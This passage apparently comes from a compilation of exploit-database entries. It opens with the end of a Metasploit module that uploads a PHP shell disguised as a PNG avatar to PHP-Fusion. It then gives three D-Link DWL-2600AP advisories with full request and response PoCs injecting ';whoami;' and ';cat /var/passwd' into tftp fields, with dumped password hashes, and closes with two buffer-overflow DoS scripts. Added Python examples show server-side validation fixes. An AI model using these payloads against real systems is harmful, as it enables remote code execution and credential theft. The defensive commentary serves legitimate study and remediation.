    pdata.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
    pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
    pdata.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
    pdata.add_part('1', nil, nil, 'form-data; name="delAvatar"')
    pdata.add_part("<?" + pay, 'image/png', nil, "form-data; name=\"user_avatar\"; filename=\"#{fname}\"")
    pdata.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
    pdata.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
    pdata.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
    data = pdata.to_s

    res = send_request_cgi({
      'method' => 'POST',
      'data'   => data,
      'agent'  => 'Mozilla',
      'ctype'  => "multipart/form-data; boundary=#{pdata.bound}",
      'cookie' => ncookie,
      'uri'    => normalize_uri(target_uri.path, "edit_profile.php")
    })

    location = res.redirection.to_s

    if res && res.code == 302 && location.include?('error')
      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
    else
      print_status("Trying to upload #{fname}")
      return true
    end
  end

  ##
  # Exploit controls and information
  ##
  def exploit
    cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
    if upload_shell(cookie, true)
      print_good("Control was bypassed. Harmful file upload successfully!")
      exec
    end
  end
  ##
  # The end of the adventure (o_O) // AkkuS
  ##
end
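The module's description says the only control on the avatar upload was a client-side JavaScript pre-check, and the multipart part it builds shows exactly what such a check misses: a .php file name sent with a Content-Type of image/png. The following is an added example (not PHP-Fusion's code, and not the fix in the referenced commit) of the server-side validation that closes this class of bypass. Function names, the size limit and the stored-name scheme are assumptions made for the example.

```python
import os
import re

# Leading bytes of the image types an avatar endpoint reasonably accepts.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# The stem may not contain a dot, which rules out "shell.php.png" style names.
SAFE_STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
MAX_AVATAR_BYTES = 512 * 1024  # assumed limit for the example


def validate_avatar(filename: str, data: bytes):
    """Server-side check that trusts nothing the client claims.

    The client's Content-Type header is deliberately not a parameter: the
    module above sets it to image/png on a PHP file, so it carries no trust.
    Only the extension, the file body and its size are examined.
    Returns (ok, reason).
    """
    if not data or len(data) > MAX_AVATAR_BYTES:
        return False, "empty or oversized upload"
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in IMAGE_MAGIC:
        return False, f"extension {ext or '(none)'} not in allowlist"
    if not SAFE_STEM_RE.fullmatch(stem):
        return False, "unsafe characters or double extension in file name"
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, "file body does not match declared image type"
    # Crude but cheap: an image that must pass through a PHP-serving directory
    # should never carry an open tag. Re-encoding the image is the stronger fix.
    if b"<?" in data:
        return False, "embedded PHP open tag"
    return True, "ok"


def store_avatar(user_id: int, filename: str, data: bytes) -> str:
    """Return the server-chosen file name; the client's name is never reused."""
    ok, reason = validate_avatar(filename, data)
    if not ok:
        raise ValueError(reason)
    ext = os.path.splitext(filename)[1].lower()
    return f"avatar_{user_id}{ext}"


if __name__ == "__main__":
    # Constructed inputs: a minimal PNG header and a text file renamed to .php.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
    print(validate_avatar("me.png", png))
    print(validate_avatar("abcdefgh.php", b"<?php echo 'x'; ?>"))
    print(validate_avatar("me.php.png", png))
```

Two design points matter here. The uploaded file is renamed by the server, so even a validation gap would not let a client pick the name that the web server later maps to a handler. And the checks are layered: the extension allowlist, the magic-bytes comparison and the stem pattern each independently reject the module's upload, so a future slip in one of them does not reopen the hole on its own.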
23. Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.

Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)

Exploitation Technique:
=======================
Local

Severity Level:
===============
HIGH

CVE: CVE-2019-20499
CVE: CVE-2019-20500
CVE: CVE-2019-20501

Base Score (CVSS):
===============
7.8
===============

Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=config_restore

Vulnerable POST Form Data Parameter:
[+] configRestore
[+] configServerip
===========================

Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers. There is no input validation on the POST Form Data Parameter "configRestore" and the Form Data Parameter "configServerip" (the input is passed directly to the TFTP command), which allows attackers to execute arbitrary Operating System Commands on the device for malicious purposes. The attacker has to know the credentials in order to access the Panel.
For security demonstration or to reproduce the vulnerability follow the provided information in the attachment provided Screenshot2.jpg.

--- PoC Session Logs ---
POST /admin.cgi?action=config_restore HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 357
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_restore
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E

------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="optprotocol"

up
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configRestore"

;whoami;
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configServerip"

;cat /var/passwd;cat /var/passwd
------WebKitFormBoundary4ZAwHsdySFjwNXxE--

----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note : for testing put the values in the fields like this : ;command1;same_command1;command2;command2

----+Discovered By Raki Ben Hamouda----+


Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)

Exploitation Technique:
=======================
Local

Severity Level:
===============
HIGH

Base Score (CVSS):
===============
7.8
===============

Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=config_save

Vulnerable POST Form Data Parameter:
[+] configBackup
[+] downloadServerip
==========================

Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote or local authenticated attackers. There is no input validation on the POST Form Data Parameter "configBackup" and the Form Data Parameter "downloadServerip" (the input is passed directly to the TFTP command), which allows attackers to execute arbitrary Operating System Commands on the device for malicious purposes. The attacker has to know the credentials in order to access the Panel.
For security demonstration or to reproduce the vulnerability follow the provided information in the attachment provided Screenshot3.jpg.

--- PoC Session Logs ---
POST /admin.cgi?action=config_save HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_save
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E

check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd

----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
sh: .xml: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note : for testing put the values in the fields like this : ;command1;same_command1;command2;etc...

----+Discovered By Raki Ben Hamouda----+


Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)

Exploitation Technique:
=======================
Local

Severity Level:
===============
HIGH

Base Score (CVSS):
===============
7.8
===============

Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=upgrade

Vulnerable POST Form Data Parameter:
[+] firmwareRestore
[+] firmwareServerip
===========================

Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers. There is no input validation on the POST Form Data Parameter "firmwareRestore" and the Form Data Parameter "firmwareServerip" (the input is passed directly to the TFTP command), which allows attackers to execute arbitrary Operating System Commands on the device for malicious purposes. The attacker has to know the credentials in order to access the Panel.
For security demonstration or to reproduce the vulnerability follow the provided information in the attachment provided Screenshot1.jpg.

--- PoC Session Logs ---
POST /admin.cgi?action=upgrade HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 525
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: xxxxxxxxw
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=upgrade
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E

------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="optprotocol"

up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareRestore"

;whoami;whoami
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareServerip"

;cat /var/passwd;cat /var/passwd
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"

up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL--

----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note : for testing put the values in the fields like this : ;command1;same_command1;command2;etc...

----+Discovered By Raki Ben Hamouda----+
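All three D-Link advisories describe the same root cause: a file name and a server address from the form are spliced into a tftp command line that a shell then parses, which is why a ";" in either field runs a second command and the device's own tftp usage text comes back in the response. The following is an added example (not D-Link firmware code) of how the two fields would be handled so that this cannot happen: strict allowlists on both values, then an argv list handed to the process without a shell. The option letters -g/-p, -r and -l are the ones printed in the device's usage text above; the local path under /tmp and the exact command shape are assumptions for the example.

```python
import ipaddress
import re
import subprocess

# Assumed allowlist: a backup or firmware file name is a short token plus an
# extension. No path separators, no shell metacharacters, no leading dot.
FILENAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,48}\.(xml|bin)$")


def build_tftp_argv(direction: str, filename: str, server: str) -> list:
    """Validate both form fields and return an argv list for BusyBox tftp.

    direction: "get" (restore / upgrade: fetch from the server, -g) or
               "put" (save: push to the server, -p).
    filename:  the remote file name from configRestore / configBackup /
               firmwareRestore.
    server:    the literal IP address from the *Serverip field; host names are
               rejected on purpose so nothing here ever reaches a resolver or
               a shell.
    """
    if direction not in ("get", "put"):
        raise ValueError("direction must be 'get' or 'put'")
    if not FILENAME_RE.fullmatch(filename):
        raise ValueError("file name rejected by allowlist")
    try:
        ip = ipaddress.ip_address(server)
    except ValueError:
        raise ValueError("server must be a literal IPv4/IPv6 address") from None
    flag = "-g" if direction == "get" else "-p"
    # The local path is constructed by the server, never taken from the client.
    return ["/usr/bin/tftp", flag, "-r", filename, "-l", f"/tmp/{filename}", str(ip)]


def is_accepted(direction: str, filename: str, server: str) -> bool:
    """True if the two fields would be allowed to reach tftp at all."""
    try:
        build_tftp_argv(direction, filename, server)
        return True
    except ValueError:
        return False


def run_tftp(direction: str, filename: str, server: str) -> int:
    """Run the validated command without a shell and return its exit status."""
    argv = build_tftp_argv(direction, filename, server)
    # argv goes straight to execve(): no /bin/sh parses it, so ';' or '`' in a
    # field could only ever be literal characters, and the allowlist already
    # rejects them anyway. Two independent layers.
    return subprocess.run(argv, shell=False, check=False, timeout=30).returncode


if __name__ == "__main__":
    # Constructed inputs: one legitimate restore, then the field values the
    # advisories above submit.
    print(build_tftp_argv("get", "config.xml", "192.0.2.10"))
    for fname, srv in ((";whoami;", "192.0.2.10"),
                       ("config.xml", ";cat /var/passwd;cat /var/passwd"),
                       (";whoami;whoami;.xml", "192.0.2.10")):
        print(fname, srv, "->", "accepted" if is_accepted("get", fname, srv) else "rejected")
```

The allowlist and the no-shell execution are deliberately independent: if a later change loosened FILENAME_RE, the argv form would still keep ";cat /var/passwd" as a single (failing) file-name argument rather than a second command, and if someone reintroduced a shell, the allowlist would still have rejected every value shown in the session logs.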
24. # -*- coding: utf-8 -*-
# Exploit Title: Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe
# Version: 2.17
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "Selfie_resize.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open Selfie Studio
# 4.- Go to 'Image' > 'Resize Image...'
# 5.- Paste clipboard in the 'New Width/New Height' field
# 6.- Click OK
# 7.- Crashed

buffer = "\x41" * 1000

f = open("PoC.txt", "w")
f.write(buffer)
f.close()
25. # -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "TwistedBrush_resize.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open TwistedBrush Pro Studio
# 4.- Go to 'Image' > 'Resize Image...'
# 5.- Paste clipboard in the 'New Width/New Height' field
# 6.- Click OK
# 7.- Crashed

buffer = "\x41" * 1000

f = open("PoC.txt", "w")
f.write(buffer)
f.close()